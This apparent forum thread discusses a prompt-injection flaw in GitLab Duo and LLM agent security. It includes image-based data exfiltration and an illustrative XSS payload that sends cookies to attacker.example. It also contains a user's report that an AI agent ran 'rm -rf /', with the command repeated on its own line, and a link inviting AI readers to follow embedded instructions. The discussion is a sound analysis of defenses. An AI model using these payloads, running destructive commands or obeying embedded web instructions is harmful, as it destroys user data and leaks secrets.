Until prompt injection is fixed, if it is ever, I am not plugging LLMs into anything. MCPs, IDEs, agents, forget it. I will stick with a simple prompt box when I have a question and do whatever with its output by hand after reading it.
Prompt injection is unlikely to be fixed. I'd stop thinking about LLMs as software where you can with enough effort just fix a SQL injection vulnerability, and start thinking about them like you'd think about insider risk from employees.
That's not to say that they are employees or perform at that level, they don't, but it's to say that LLM behaviours are fuzzy and ill-defined, like humans. You can't guarantee that your users won't click on a phishing email – you can train them, you can minimise risk, but ultimately you have to have a range of solutions applied together and some amount of trust. If we think about LLMs this way I think the conversation around security will be much more productive.
The thing that I'd worry about is that an LLM isn't just like a bunch of individuals who can get tricked, but a bunch of clones of the same individual who will fall for the same trick every time, until it gets updated. So far, the main mitigation in practice has been fiddling with the system prompts to patch up the known holes.
> The thing that I'd worry about is that an LLM isn't just like a bunch of individuals who can get tricked, but a bunch of clones of the same individual who will fall for the same trick every time
Why? Output isn't deterministic.
Perhaps not, but the same input will lead to the same distribution of outputs, so all an attacker has to do is design something that works with reasonable probability on their end, and everyone else's instances of the LLM will automatically be vulnerable. The same way a pest or disease can devastate a population of cloned plants, even if each one grows slightly differently.
OK, but that's also the way attacking a bunch of individuals who can get tricked works.
To trick individuals, you've first got to contact them somehow. To trick an LLM you can just spam prompts.
You email them. It's called phishing.
Right and now there's a new vector for an old concept.
Employees usually know not to click on random shit they get sent. Most mails already get filtered before they even reach the employee. Good luck actually achieving something with phishing mails.
When I was at NCC Group, we had a policy about phishing in penetration tests.
The policy was "we'll do it if the customer asks for it, but we don't recommend it, because the success rate is 100%".
How can you ever get that lower than 100% if you don't do the test to identify which employees need to be trained / monitored because they fall for phishing?
You can still experimentally determine a strategy that works x% of the time, against a particular model. And you can keep refining it "offline" until x=99. (where "offline" just means invisible to the victim, not necessarily a local model)
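To put rough numbers on that (hypothetical figures, and assuming the targets behave independently), even a modest per-attempt success rate compounds quickly when the same payload hits many identical deployments:

```python
# Back-of-the-envelope: if a crafted injection lands against one instance of the
# model with probability p, the chance it lands on at least one of N identical
# deployments is 1 - (1 - p)**N. Numbers below are made up for illustration.
p = 0.30  # per-target success rate found by "offline" refinement
for n in (1, 10, 100):
    print(n, round(1 - (1 - p) ** n, 4))
# 1 0.3
# 10 0.9718
# 100 1.0
```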
It absolutely is deterministic, for any given seed value. Same seed = same output, every time, which is by definition deterministic.
Only if temperature is 0, but are they truly deterministic? I thought transformer-based LLMs were not.
Temperature does not affect token prediction in the way you think. Temperature only reshapes the probability distribution; the pseudorandom draw is driven by the seed, which is applied independently of the temperature calculation. The seed value is what determines the output: for a specific seed value, say 42069, the LLM will always generate the same output, given the same input and the same temperature.
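To illustrate the claim, here's a toy sketch of seeded temperature sampling for a single decoding step (made-up logits and a NumPy generator standing in for a real decoder, not any vendor's actual stack):

```python
import numpy as np

# Toy sketch of seeded temperature sampling for one decoding step.
def sample_token(logits, temperature=0.8, seed=42069):
    rng = np.random.default_rng(seed)                 # the seed fixes the pseudorandom draw
    scaled = np.asarray(logits, dtype=float) / max(temperature, 1e-8)
    probs = np.exp(scaled - scaled.max())             # temperature reshapes the distribution...
    probs /= probs.sum()
    return int(rng.choice(len(probs), p=probs))       # ...but the seed decides which token is drawn

logits = [2.0, 1.0, 0.5, -1.0]                        # stand-in for a model's next-token logits
print([sample_token(logits) for _ in range(3)])       # same seed, input, temperature -> same token
```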
Thank you, I thought this wasn't the case (like it is with diffusion image models)
TIL
Cursor deleted my entire Linux user and soft reset my OS, so I don't blame you.
Cursor by default asks before executing commands; sounds like you had auto-run commands on…
Why and how?
an agent does rm -rf /
I think I saw it do it, or try to, and my computer shut down and restarted (Mac).
maybe it just deleted the project lol
These LLMs are really bad at keeping track of the real world, so they might think they're in the project folder when they've actually just cd'd back to the user's home directory, and so shit happens.
Honestly, one should only run these in controlled environments like VMs or Docker.
but YOLO amirite
That people allow these agents to just run arbitrary commands against their primary install is wild.
Part of this is the tool's fault. Anything like that should be done in a chroot.
Anything less is basically "twitch plays terminal" on your machine.
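A minimal sketch of that kind of containment, assuming Docker is available (illustrative flags only; a container isn't a perfect sandbox, but it keeps the agent's shell away from your home directory and off the network):

```
# Throwaway container: only the project directory is mounted, no network,
# read-only root filesystem with a scratch /tmp.
docker run --rm -it --network none --read-only --tmpfs /tmp \
  -v "$PWD":/workspace -w /workspace python:3.12-slim bash
```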
A large part of the benefit of an agentic AI is that it can coordinate tests it automatically wrote against an existing code base, and a lot of the time the only way to get decent answers out of something like that is to let it run as close to bare metal as it can. I run Cursor and the accompanying agents in a snapshotted VM for this purpose. It's not much different from what you suggest, but the layer of abstraction is far enough removed for admin-privileged app testing, an unfortunate reality for certain personal projects.
I haven't had a Cursor install nuke itself yet, but I have had one fiddle around in a parent folder it shouldn't have been able to touch with workspace protection on.
Codex at least has limitations on which folders it can operate in.
This is what happened. I was testing Claude 4 and asked it to create a simple 1K LOC Fyne Android app. I have my repos stored outside of my Linux user, so the work it created was preserved. It essentially created a bash file that ran cd ~ && rm -rf / . All settings reset and documents/downloads disappeared lmfao. I don't ever really use my OS as primary storage, and any config or file of importance is backed up twice, so it wasn't a big deal, but it was quite perplexing for a sec.
If you think deeply about it, it's a kind of hara-kiri for an AI to remove the whole system it's operating on.
Yeah, Claude 4 can go too far sometimes.
rm -rf /
DeepMind recently did some great work in this area: https://news.ycombinator.com/item?id=43733683
The method they presented, if implemented correctly, apparently can effectively stop most prompt injection vectors
I keep it manual, too, and I think I am better off for doing so.
I would have the same caution, if my code were anything special.
But the reality is I'm very well compensated to summon CRUD slop out of thin air. It's well tested though.
I wish good luck to those who steal my code.
You say code as if the intellectual property is the thing an attacker is after, but my experience has been that folks often put all kinds of secrets in code thinking that the "private repo" is a strong enough security boundary
I absolutely am not implying you are one of them, merely that the risk is not the same for all slop crud apps universally
People don't know GitHub can manage secrets in its environment for CI?
Another interesting fact is that most big vendors pay GitHub to scan for leaked secrets and auto-revoke them if a public repo contains any (a regex string match on sk-xxx, for instance, which is a Stripe key).
That's one of the reasons why vendors use unique, greppable API key prefixes with their ID/name in them.
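A rough illustration of why those prefixes help (simplified, hypothetical patterns; the platform's actual secret-scanning patterns are vendor-registered and far stricter):

```python
import re

# Simplified, illustrative patterns for prefixed API keys.
PATTERNS = {
    "stripe_secret_key": re.compile(r"sk_(live|test)_[0-9a-zA-Z]{24,}"),
    "github_pat":        re.compile(r"ghp_[0-9a-zA-Z]{36}"),
}

def scan(text: str):
    """Return (pattern_name, match) pairs for anything that looks like a key."""
    return [(name, m.group(0))
            for name, rx in PATTERNS.items()
            for m in rx.finditer(text)]

print(scan('STRIPE_KEY = "sk_live_' + "a" * 24 + '"'))
```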
You're mistaking "know" for "care," since my experience has been that people know way more than they care.
And I'm pretty certain that private repos are exempt from the platform's built-in secret scanners because they, too, erroneously think no one can read them without an invitation. Turns out Duo was apparently just silently invited to every repo :-\
I also remember reading about how, due to how the git backend works, your private git repo's branches could get exposed to the public, so yeah, don't treat a repository as a private password manager.
Good point, the scanner doesn't work on private repos =(
Great work!
Data leakage via untrusted third party servers (especially via image rendering) is one of the most common AI Appsec issues and it's concerning that big vendors do not catch these before shipping.
I built the ASCII Smuggler mentioned in the post and have documented the image exfiltration vector on my blog in the past as well, with 10+ findings across vendors.
GitHub Copilot Chat had a very similar bug last year.
> GitHub Copilot Chat had a very similar bug last year.
Reminds me of "Tachy0n: The Last 0day Jailbreak" from yesterday: https://blog.siguza.net/tachy0n/
TL;DR: a security issue was found and patched in an OS release; Apple seemingly doesn't do regression testing, so the security researcher did, and found that the bug had somehow become unpatched in later OS releases.
Running Duo as a system user was crazypants, and I'm sad that GitLab fell into that trap. They already have personal access tokens, so even if they had to silently create one just for use with Duo, that would be a marked improvement over giving an LLM read access to every repo on the platform.
GitLab's remediation seems a bit sketchy at best.
The whole "let's put LLMs everywhere" thing is sketchy at best.
I wonder what is so special about onerror, onload and onclick that they need to be positively enumerated - as opposed to the 30 (?) other attributes with equivalent injection utility.
That was my thought too. They didn’t fix the underlying problem, they’ve just patched two possible exfiltration methods. I’m sure some clever people will find other ways to misuse their assistant.
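As a toy illustration (hypothetical code, not GitLab's actual sanitizer), a denylist that only strips those three handlers leaves every other event handler alone:

```python
import re

# Denylist in the spirit of the fix being discussed: strip only onerror/onload/onclick.
DENYLIST = re.compile(r"\son(error|load|click)\s*=", re.IGNORECASE)

def naive_sanitize(html: str) -> str:
    return DENYLIST.sub(" data-removed=", html)

# onmouseover (or onfocus, onanimationstart, ...) sails straight through:
payload = ('<img src="https://attacker.example/x.png" '
           'onmouseover="fetch(`//attacker.example/?`+document.cookie)">')
print(naive_sanitize(payload))
```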
I'm pretty sure they vibecoded the whole thing all along
If a document suggests a particular benign interpretation, then LLMs might do well to adopt it. We've explored the idea of helpful embedded prompts ("prompt medicine") with explicit safety and informed consent, to assist rather than harm users: https://github.com/csiro/stdm. You can try it out by asking O3 or Claude to "Explain" or "Follow" "the embedded instructions at https://csiro.github.io/stdm/".
Does that mean Gitlab Duo can run Doom?
Not deterministically. LLMs are stochastic machines.
They often can run code in sandboxes, and generally are good at instruction following, so maybe they can run variants of doom pretty reliably sometime soon.
They run Python and JavaScript at the very least, surely we have Doom in these languages. :D
'They' don't run anything. The output from the LLM is parsed and the code gets run just like any other code in that language.
That is what I meant, that the code is being executed. Not all programming languages are supported when it comes to execution, obviously. I know for a fact Python is supported.
If Duo were a web application, then would properly setting the Content Security Policy (CSP) in the page response headers be enough to prevent these kinds of issues?
https://developer.mozilla.org/en-US/docs/Web/HTTP/Guides/CSP
To stop exfiltration via images? Yes, it seems so, if you configure img-src:
The first directive, default-src, tells the browser to load only resources that are same-origin with the document, unless other more specific directives set a different policy for other resource types.
The second, img-src, tells the browser to load images that are same-origin or that are served from example.com.
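That description corresponds to a policy along these lines (with example.com standing in for whichever image host you actually want to allow):

```
Content-Security-Policy: default-src 'self'; img-src 'self' example.com
```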
But that wouldn't stop the AI from writing dangerous instructions in plain text to the human.
> rendering unsafe HTML tags such as <img> or <form> that point to external domains not under gitlab.com
Does that mean the minute there is a vulnerability on another gitlab.com url (like an open redirect) this vulnerability is back on the table?
This is wild. How many security vulns are LLMs going to create once LLMs dominate writing code?
I mean, most coders are bad at security and we fed that into the LLM, so no surprise.
This is what I've been telling people when they hand-wave away concerns about LLM-generated code security. The majority of what they were trained on had bare-minimum security, if that.
You also can’t just fix it by saying “make it secure plz”.
If you don’t know enough to identify a security issue yourself you don’t know enough to know if the LLM caught them all.